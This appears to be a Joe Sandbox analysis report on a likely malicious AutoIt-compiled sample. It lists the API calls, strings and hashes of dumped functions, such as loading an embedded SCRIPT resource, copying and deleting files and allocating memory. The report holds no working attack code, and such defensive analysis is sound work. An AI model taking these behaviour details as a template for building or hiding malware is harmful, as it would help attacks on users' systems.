Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 55197ef672014b86ed5715ec13e8b66e22be7c87212998f5c737202c295c6be8
Instruction ID: 82b876950e848b70d56e5a8ab794061a015851148fbf645e8cb77cb039169abf
Opcode Fuzzy Hash: 55197ef672014b86ed5715ec13e8b66e22be7c87212998f5c737202c295c6be8
Instruction Fuzzy Hash: A59105319897C1DEDB31DF688551AAABFF4AF3A310B0449ADD0C683A41D238B509E759

Function 00F94E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F94D8E,?,?,00000000,00000000), ref: 00F94E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F94D8E,?,?,00000000,00000000), ref: 00F94EB0
LoadResource.KERNEL32(?,00000000,?,?,00F94D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F94E2F), ref: 00FCD937
SizeofResource.KERNEL32(?,00000000,?,?,00F94D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F94E2F), ref: 00FCD94C
LockResource.KERNEL32(00F94D8E,?,?,00F94D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F94E2F,00000000), ref: 00FCD95F

Strings

SCRIPT, xrefs: 00F94EA6

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: eb4be0197fd52e5f145cef9b120b12f3653e26d33d06cdd8fcb5d28d26a6c102
Instruction ID: 43e568b8206734a584d5d1dd361f1187731e5b2ac63acf68764f5979f7c501ec
Opcode Fuzzy Hash: eb4be0197fd52e5f145cef9b120b12f3653e26d33d06cdd8fcb5d28d26a6c102
Instruction Fuzzy Hash: 24119E75640701BFEB209B65EC48F677BBAFBC5B11F10426CF44586250DB7AEC059660

Function 00F9FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: b2bd9858cce4760756a8dc491ef85ee7c3065d50be2bec6a987e4d24ac3ed2db
Instruction ID: f8ec69fbbef4e85e872e48906b3154bbbaf387447a79f3cbcd37ebd26f526035
Opcode Fuzzy Hash: b2bd9858cce4760756a8dc491ef85ee7c3065d50be2bec6a987e4d24ac3ed2db
Instruction Fuzzy Hash: F6928EB1A083418FD720DF14C480B6BB7E1BF86314F18896DE89A8B351DB75EC45EB92

Function 00FF445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00FCE398), ref: 00FF446A
FindFirstFileW.KERNELBASE(?,?), ref: 00FF447B
FindClose.KERNEL32(00000000), ref: 00FF448B

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 30e32ae44c8d0f351c01b31d1274d89e6eee5f8462341a1055cdbda46671e2c3
Instruction ID: a9a51fece654bf0f5cdd5984a1c41b7b2c729f8321dcd7cf15a76b0910ee6001
Opcode Fuzzy Hash: 30e32ae44c8d0f351c01b31d1274d89e6eee5f8462341a1055cdbda46671e2c3
Instruction Fuzzy Hash: 8AE0D833810905675220AA38EC0D4FA775C9E05335F104705FD75D10D0EB7C6904A695

Function 00F9E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00FD3E62

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 3da126c3529c5408784ac9ef994809a361d41a596eeb9f39c388156e100afd6f
Instruction ID: e02d28c83b0d44bdf62df2eed8c04f8d7cdc3a1b553627c7a97c4bb1da82c7f7
Opcode Fuzzy Hash: 3da126c3529c5408784ac9ef994809a361d41a596eeb9f39c388156e100afd6f
Instruction Fuzzy Hash: B3A27B75E00209CFEF24CF58C480AAAB7B2FF58314F68805AE945AB351D735ED46EB91

Function 00FA09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FA0A5B
timeGetTime.WINMM ref: 00FA0D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FA0E53
Sleep.KERNEL32(0000000A), ref: 00FA0E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00FA0EFA
DestroyWindow.USER32 ref: 00FA0F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FA0F20
Sleep.KERNEL32(0000000A,?,?), ref: 00FD4E83
TranslateMessage.USER32(?), ref: 00FD5C60
DispatchMessageW.USER32(?), ref: 00FD5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FD5C82

Strings

@COM_EVENTOBJ, xrefs: 00FD54F0
@GUI_CTRLHANDLE, xrefs: 00FD4FE4
@GUI_CTRLID, xrefs: 00FD4F3A
@GUI_WINHANDLE, xrefs: 00FD4F8F
@TRAY_ID, xrefs: 00FD578F

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 919e6096d1171de7f6e55e096923c016ed7723e95941d279e80ce25d253e5295
Instruction ID: 667891ad234d4f8ea30097788928e94d3f4b0bafe0f7df926016a67e32a23c45
Opcode Fuzzy Hash: 919e6096d1171de7f6e55e096923c016ed7723e95941d279e80ce25d253e5295
Instruction Fuzzy Hash: 0BB20470A08741DFDB24DF24C884BAAB7E2BF85714F18491EF48997391CB79E844EB42

Function 00FF9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FF8F5F: __time64.LIBCMT ref: 00FF8F69

Part of subcall function 00F94EE5: _fseek.LIBCMT ref: 00F94EFD

__wsplitpath.LIBCMT ref: 00FF9234

Part of subcall function 00FB40FB: __wsplitpath_helper.LIBCMT ref: 00FB413B

_wcscpy.LIBCMT ref: 00FF9247
_wcscat.LIBCMT ref: 00FF925A
__wsplitpath.LIBCMT ref: 00FF927F
_wcscat.LIBCMT ref: 00FF9295
_wcscat.LIBCMT ref: 00FF92A8

Part of subcall function 00FF8FA5: _memmove.LIBCMT ref: 00FF8FDE
Part of subcall function 00FF8FA5: _memmove.LIBCMT ref: 00FF8FED

_wcscmp.LIBCMT ref: 00FF91EF

Part of subcall function 00FF9734: _wcscmp.LIBCMT ref: 00FF9824
Part of subcall function 00FF9734: _wcscmp.LIBCMT ref: 00FF9837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FF9452
_wcsncpy.LIBCMT ref: 00FF94C5
DeleteFileW.KERNEL32(?,?), ref: 00FF94FB
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FF9511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FF9522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FF9534

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 853dfbe5e9b8cf76b90eea57f47cdce65f642b6dac2c16b5588f9d7dd3e9a881
Instruction ID: b2a966eb1ebea23100fef80d1a422a77d00540de159fff24a52516e4bad91e93
Opcode Fuzzy Hash: 853dfbe5e9b8cf76b90eea57f47cdce65f642b6dac2c16b5588f9d7dd3e9a881
Instruction Fuzzy Hash: 99C169B1D0421DAADF21DFA5CC81EEEB7BCAF54310F0040AAF608E7151EB749A459F61

Function 00F93015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F93074
RegisterClassExW.USER32(00000030), ref: 00F9309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F930AF
InitCommonControlsEx.COMCTL32(?), ref: 00F930CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F930DC
LoadIconW.USER32(000000A9), ref: 00F930F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F93101

Strings

+, xrefs: 00F9305D
0, xrefs: 00F93056
TaskbarCreated, xrefs: 00F930A4
AutoIt v3 GUI, xrefs: 00F93090

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: ed605c83b456fc1e3b1208d25dca88508e935b2afe32f5325cb4b0e635f8290f
Instruction ID: 8e26f285a899e30f1e74886049e5ae91f2203dade0113102529e1084d060ab34
Opcode Fuzzy Hash: ed605c83b456fc1e3b1208d25dca88508e935b2afe32f5325cb4b0e635f8290f
Instruction Fuzzy Hash: 733107B184534AAFDB61CFA4E889A9ABBF0FB09310F14455EE5C0E6294D3BE0589CF51

Function 00F93041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F93074
RegisterClassExW.USER32(00000030), ref: 00F9309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F930AF
InitCommonControlsEx.COMCTL32(?), ref: 00F930CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F930DC
LoadIconW.USER32(000000A9), ref: 00F930F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F93101

Strings

+, xrefs: 00F9305D
0, xrefs: 00F93056
TaskbarCreated, xrefs: 00F930A4
AutoIt v3 GUI, xrefs: 00F93090

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 73efc179c385cddc7211066d80042f0e20abd5f892c59b9238a6cf0f24380943
Instruction ID: f38b47b9c5e0f35d7fb370fc7ddbfcded7f0d884c13e8588b4231ce357514a01
Opcode Fuzzy Hash: 73efc179c385cddc7211066d80042f0e20abd5f892c59b9238a6cf0f24380943
Instruction Fuzzy Hash: 2021C4B1D11319AFDB20DFA4E889B9EBBF4FB08710F00411AF990E6294D7BA45488F91

Function 00F9708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F94706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010552F8,?,00F937AE,?), ref: 00F94724

Part of subcall function 00FB050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00F97165), ref: 00FB052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F971A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FCE8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FCE909
RegCloseKey.ADVAPI32(?), ref: 00FCE947
_wcscat.LIBCMT ref: 00FCE9A0

Strings

\, xrefs: 00FCE9C3
Include, xrefs: 00FCE8BF, 00FCE900
Software\AutoIt v3\AutoIt, xrefs: 00F9719E
\Include\, xrefs: 00F97165

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: d56a4a5f1746d5d4b31a8eec27c375217f2eb93d99161b286809b456e1dee206
Instruction ID: a5b5f805bf7d3fd9be17a8108048a393e269eab75d3736724461ea8843e6b63d
Opcode Fuzzy Hash: d56a4a5f1746d5d4b31a8eec27c375217f2eb93d99161b286809b456e1dee206
Instruction Fuzzy Hash: 53718F715087029ED714EF65E8429AFBBF8FF84390F80052EF485871A4DB7AD948DB52

Function 00F93A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00F93A50
LoadCursorW.USER32(00000000,00007F00), ref: 00F93A5F
LoadIconW.USER32(00000063), ref: 00F93A76
LoadIconW.USER32(000000A4), ref: 00F93A88
LoadIconW.USER32(000000A2), ref: 00F93A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F93AC0
RegisterClassExW.USER32(?), ref: 00F93B16

Part of subcall function 00F93041: GetSysColorBrush.USER32(0000000F), ref: 00F93074
Part of subcall function 00F93041: RegisterClassExW.USER32(00000030), ref: 00F9309E
Part of subcall function 00F93041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F930AF
Part of subcall function 00F93041: InitCommonControlsEx.COMCTL32(?), ref: 00F930CC
Part of subcall function 00F93041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F930DC
Part of subcall function 00F93041: LoadIconW.USER32(000000A9), ref: 00F930F2
Part of subcall function 00F93041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F93101

Strings

0, xrefs: 00F93AF4
#, xrefs: 00F93AFB
AutoIt v3, xrefs: 00F93B05

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: e51b7560b27c6f48be57188d8178da3b73c194789b2e4ac2632c2cab6517ff03
Instruction ID: 39996e3e4c69c7bf8ba5c8b6cf17250215ce84c1fcb1a05007d7279c8b59956b
Opcode Fuzzy Hash: e51b7560b27c6f48be57188d8178da3b73c194789b2e4ac2632c2cab6517ff03
Instruction Fuzzy Hash: 9F214471D10309AFEF20DFA4EC09B9E7BB1FB09751F00011AF584AA295D3BE6A449F94

Function 00F93633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00F936D2
KillTimer.USER32(?,00000001), ref: 00F936FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F9371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F9372A
CreatePopupMenu.USER32 ref: 00F9373E
PostQuitMessage.USER32(00000000), ref: 00F9374D

Strings

TaskbarCreated, xrefs: 00F93725

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 423204fd9987ecf03c3373bd6dc9095f731ff4c0024045f7956531df992ad01f
Instruction ID: 71bfba9b51534359432ec80dc1cd930299fafbea60ac2ecec079166467d8fb2c
Opcode Fuzzy Hash: 423204fd9987ecf03c3373bd6dc9095f731ff4c0024045f7956531df992ad01f
Instruction Fuzzy Hash: C8414AB2604206BBFF345FA8DC09F7E3765FB01310F140129FA82D6295CA6EAD05B762

Function 00F93766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CMDLINERAW, xrefs: 00F937FB
/AutoIt3ExecuteScript, xrefs: 00F938BC
>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00F937AE
CMDLINE, xrefs: 00F93822
/AutoIt3ExecuteLine, xrefs: 00F938A7
/AutoIt3OutputDebug, xrefs: 00F93892
/ErrorStdOut, xrefs: 00F9387D

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: b9560640b92a6a5bca9502450e0b8dfc72b96aa9cf35ed3649744edc09e51b5c
Instruction ID: 248e886cbbd118de1d2c7bcc51c456e7b987f748e134dc61f321f6a56c18df9e
Opcode Fuzzy Hash: b9560640b92a6a5bca9502450e0b8dfc72b96aa9cf35ed3649744edc09e51b5c
Instruction Fuzzy Hash: 9EA18F72D1021D9AEF04EBA4DC92EEEB779BF15310F440019F415A7151EF789A08EB60

Function 01BDA130 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01BDA201
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01BDA427

Memory Dump Source

Source File: 00000000.00000002.1488564818.0000000001BD7000.00000040.00000020.00020000.00000000.sdmp, Offset: 01BD7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bd7000_bkTW1FbgHN.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction ID: 55c83eee7bd3c5a754e2888cf8c10df12635ab70e1d18bf6e224b70ea1fc1367
Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
Instruction Fuzzy Hash: EDA10974E00209EBDF18CFA4C894BEEBBB5FF48314F108599E615BB280E7B59A41CB54

Function 00F939D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F93A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F93A24
ShowWindow.USER32(00000000,?,?), ref: 00F93A38
ShowWindow.USER32(00000000,?,?), ref: 00F93A41

Strings

edit, xrefs: 00F93A1E
AutoIt v3, xrefs: 00F939FB, 00F93A00, 00F93A01

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 3ac7860cf795edc8973a913d4b603836732f831857fb6f675f205de166be0730
Instruction ID: fcea4a2ef54d7b8928390c3c35ece643600ceeec6804029146a3ad20e52306f1
Opcode Fuzzy Hash: 3ac7860cf795edc8973a913d4b603836732f831857fb6f675f205de166be0730
Instruction Fuzzy Hash: 4EF03A715403907EEB315623AC08E2B2E7DE7CBF90B00001EB944E2158C2AE1800CBB0

Function 01BD9F10 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140
fileCOMMON

